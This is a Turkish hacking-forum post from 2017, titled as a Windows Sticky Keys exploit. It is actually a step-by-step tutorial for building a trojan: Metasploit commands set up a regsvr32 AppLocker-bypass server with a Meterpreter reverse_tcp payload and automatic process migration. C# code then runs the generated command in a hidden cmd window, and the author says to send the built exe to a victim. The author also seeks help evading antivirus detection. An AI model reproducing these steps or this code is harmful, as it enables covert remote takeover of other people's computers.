İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Windows Yapışkan Tuşlar Exploit.

12-04-2017 23:55
#1
ChappieZ50 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
166
Teşekkür (Etti):
39
Teşekkür (Aldı):
5
Konular:
18
Ticaret:
(0) %

Öncelikle herkese Selamın Aleyküm.
Arkadaşlar bu konuda windowsta yapışkan tuşları exploit etmeyi göstericem ve bunu c# da bir exe ile yapmayı göstericem.
Tek kötü yanı çalıştırdıkdan sonra virus programlarının algılanmasıdır bununda bir çözümünü bulmam için bana yardımcı olabilirisiniz.

İlk başta linuxta terminali açıyoruz ve msfconsole yazıyoruz.
use exploit/windows/misc/regsvr32_applocker_bypass_server yazıyoruz

daha sonra payload eklememiz gerekicek bu komutu giriyoruz.
set payload windows/meterpreter/reverse_tcp

şimdi ise ayarlarımızı yapmamız gerekiyor ben local ağ için ayar yapıcam siz port açıp dış ağ içinde yapabilirsiniz.
set LHOST 192.168.142.139
set LPORT 6666
Örnek resim ==> http://i.hizliresim.com/ld4mZQ.png
daha sonra karşıdaki şahıs çalıştırdığında otomatik explorer.exe ye veya winlogon.exe ye bulaşmamız için autoscript ekliyelim.
set autorunscript post/windows/manage/priv_migrate
Örnek resim ==> http://i.hizliresim.com/2rPB6E.png
şimdi ise son komutumuzu veriyoruz
exploit -j -z
ve bize bir kod veriyor o kodu cmd ye yazdıkdan sonra oturum açıyoruz.
Örnek resim ==> http://i.hizliresim.com/DPGp5m.png Kırmızı alan kodumuzdur.

Şimdi ise exe ye bastığımızda otomatik kodun çalışması için c# da bir kaç satır kod yazmamız gerekiyor.
KODLARIMIZ:
ilk başta bir kütüphane eklemek gerekiyor.
using System.Diagnostics;
Şimdi ise kodlarımız.
Process cmd = new Process();
cmd.StartInfo.FileName = "cmd.exe";
cmd.StartInfo.Arguments = "/C BURAYA LİNUXTA OLUŞTURDUĞUMUZ KODU YAZIYORUZ "; // Not "/C" bu ifadenin durması önemli yoksa cmd ekranda açık kalır.
cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
cmd.Start();

ve bu kadar build yapıyoruz ve exe dosyamızı kurbana yolluyoruz.
Unutmayın exe dosyasında virüs görmez 0/35 ama çalışında antivürus programı görür.

Herhangi bir sorun olursa özelden veya yorumdan yazınız.
Konu acemice oldu yeniyim ilkdefa böyle konu açıyorum



Kullanıcı İmzası
Ahmak olmasaydı insan Bütün savaşlar dostça kazanılırdı
Konu ChappieZ50 tarafından (13-04-2017 00:01 Saat 00:01 ) değiştirilmiştir.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı